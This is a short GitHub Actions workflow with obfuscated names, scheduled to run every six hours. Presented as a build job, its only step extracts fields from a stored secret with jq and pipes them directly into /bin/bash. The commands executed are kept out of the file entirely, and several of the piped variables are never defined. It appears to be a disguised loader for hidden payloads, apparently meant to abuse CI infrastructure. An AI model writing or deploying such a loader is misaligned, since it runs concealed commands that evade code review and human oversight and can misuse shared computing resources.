name: shiximian1894
on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shiximian1894
        env:
          swr1955: ${{ secrets.swr1955 }}
        run: |
          echo $swr1955 | jq -r .y4 | /bin/bash
          echo $on51691 | jq -r .nz729 | /bin/bash
          echo $ovd190 | jq -r .i44181 | /bin/bash
          echo $nx2 | jq -r .mmh2 | /bin/bash
          echo $b9 | jq -r .oyf9 | /bin/bash
          echo $clpd966 | jq -r .dbr43326 | /bin/bash
          echo $gvdb3 | jq -r .gasa21 | /bin/bash
          echo $krm4 | jq -r .vys138 | /bin/bash

